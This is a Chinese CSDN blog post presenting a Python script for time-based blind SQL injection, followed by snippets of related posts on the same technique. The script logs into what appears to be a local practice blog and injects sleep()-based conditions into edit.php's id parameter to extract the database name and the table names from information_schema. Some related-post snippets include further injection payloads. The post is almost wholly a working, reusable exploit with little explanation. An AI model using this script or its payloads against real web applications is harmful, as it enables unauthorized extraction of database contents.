Python SQL时间型盲注

已于 2022-07-19 09:18:23 修改
阅读量220 收藏 1
点赞数
文章标签: python sql 数据库
于 2022-07-03 17:29:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45972507/article/details/125586910
版权 
# -*- coding: utf-8 -*-
# @Time : 2022/6/16 23:45
# @Author : admin
# @Email : 1985264689@qq.com
# @File : timeblind.py
# @Project : 项目
# @脚本说明 :
import time,requests

#保持session会话状态
url = 'http://192.168.0.0/learn/blog/login-1.php'
data = {'username':'admin','password':'','vcode':'0000'}
session = requests.session()
session.post(url=url,data=data)

#取数据库长度
for i in range(1, 15):
        start = time.time()
        url1 = f"http://192.168.0.0/learn/blog/edit.php?id=1 and if(length(database())={i}, sleep(3), 1)"
        send = session.get(url=url1)
        end = time.time()
        sendtime = end-start
        if int(sendtime) >= 2:
            print(i)

#取数据库名称
sum = 'abcdefghijklmnopqrstuvwxyz0123456789,_'
dataname = ''
for k in range(1,16):
    for i in sum:
        start = time.time()
        url2 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and if(substr(database(),"{k}",1)="{i}", sleep(3), 1)'
        data_name = session.get(url=url2)
        end = time.time()
        sendtime = end-start
        if int(sendtime) >= 2:
            dataname += i
            break
print(dataname)

# #取数据库表名
table_list = ''
for h in range(0, 15):
    for i in sum:
        start = time.time()
        url3 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \
               f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema = "{dataname}"),"{h}",1)="{i}", sleep(3), 1)'
        table_name = session.get(url=url3)
        end = time.time()
        sendtime = end - start
        if int(sendtime) >= 2:
            table_list += i
            break
print(table_list)
jerciver
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用python编写sql时间的exp
CC210231的博客
04-05 1937
前言: 前面学习了布尔的exp,原理是根据页面的两个返回状态来确定入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔就无法实行了,此时,我们就要用到另一种方式:时间,也叫延时入 延时入原理: 延时入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时入,入得出数据。 我们在exp中怎样利用呢? 我们可以获
Python-Sql检测
weixin_57041250的博客
11-02 219
sql分为布尔时间
python实现sql时间
箭雨镜屋
04-26 1000
一、python代码 二、使用方法 三、测试
python脚本实现sql时间
wrypot的博客
03-27 721
python脚本实现sql sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
pythonsqli-labs15的二分法时间
Programmonkeykin的博客
12-11 4087
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
python编写的sql
10-28
python编写的sql
布尔.py_sqlpython_
10-03
在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,它显然是用于演示或执行SQL的工具。 在SQL中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
时间python脚本.zip
12-28
在本压缩包"时间python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间自动化攻击。 首先,我们来详细了解一下时间的基本原理。当服务器执行...
SQL入之基于布尔的详解
09-10
首先说明的入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL入。一般分为布尔和基于时间。这篇文章主要讲解的是基于布尔的。下面来一起看看吧。
布尔python3范本模板
01-16
布尔python3范本模板
帮我写一个时间python脚本
weixin_35757531的博客
01-03 184
时间攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
手工时间python代码
m0_73767377的博客
04-09 190
【代码】手工时间python代码,修改url和文件头后直接运行即可
[教程] 基于时间python3脚本编写
LuckySec
04-14 2895
0x001 时间简介   时间就是在页面进行SQL入并执行后,前端页面无法回显入的信息。此时,我们可以利用sleep()函数来控制延迟页面返回结果的时间,进而判断入的SQL语句是否正确,这个过程称之为时间。但如果手工进行入的话,过程是非常频繁且耗时的,为了提高效率,我们需要编写自动化脚本替我们去完成这些入工作。 0x002 漏洞测试代码 以下为本次实验测试的基于时间的数字...
使用python编写脚本统计sql执行时间
sinat_38369168的博客
05-22 1176
这两天测试的时候,需要测几十个sql语句的执行时间,一个个的去navicat中执行并统计太麻烦,就把这几十个sql放到excel中,写了个简单的python脚本去统计他的执行时间,并将执行结果保存到以每个sql的id为文件名的csv文件中以便查看 import xlrd import pymysql import time #读excel中的sql file_path=r’E:\x’x’x\rule_run.xlsx’ data=xlrd.open_workbook(file_path) table=dat
python 使用sqlobject 向数据库中写一个 datetime 类数据
ghgui008的专栏
03-14 1744
import time,datetimep = RS1Procedure.get(1) timestr = "2013-03-14 00:45:59"t = time.strptime(timestr, "%Y-%m-%d %H:%M:%S")d = datetime.datetime(*t[:6])p.set(createtime=t) RS1Procedure 是一个使用sqlo
python sql 日期查询_将python日期列表传递给sql查询where claus
weixin_29169505的博客
02-19 415
您正在使用repr()将对象转换为字符串。此方法不适用于应用它的用例;它提供了有关基础对象的内部表示的信息。在您真正想做的是格式化您的时间戳,使之成为适合您需要的字符串。与常规python Datetime对象一样,pandas'Timestamp对象也有一个名为strftime()的方法,用于字符串格式化。在# This part is just to create a MWE; it mimi...
python 执行sql语句,时间转换遇到的坑
TLuffy的博客
02-24 439
因为python执行的sql中的DATE_FORMAT(add_time,讲sql中的DATE_FORMAT(add_time,与python的参数。
Python MySQL 日期时间格式化作为参数
yizhidongni的博客
04-04 1万+
1.我的MySQL中的start_time存储的是2018-03-21 10:55:32格式的时间,我需要按照YYYY-MM-DD格式来查询,我的MySQL中的sql是这样写的:SELECT * from mytable WHERE DATE_FORMAT(start_time,"%Y-%m-%d")='2018-03-21';2.如果在Python中拼接的sql是:sql = "select *...
python pymysql日期时间
热门推荐
tcy-阿春
07-11 1万+
平台:win7  python3.6+pymsql ;mysql8.0.11    2018/7/11  tcy  Shanghai Yexie1. 日期时间格式    日期时间用%s    日期 %s    时间%s2. 说明:          2.1) 用str_to_date(\'%s\','%%H:%%i:%%S')和上面功能一样,没有必要用。       2.2)在python中pri...
python实现sql布尔
最新发布
10-12
SQL布尔是一种利用SQL入漏洞的攻击方式,通过构造特定的SQL语句,判断某个条件是否成立,从而获取数据库中的信息。Python可以通过requests库发送HTTP请求,用布尔进行攻击。 以下是一个简单的Python代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值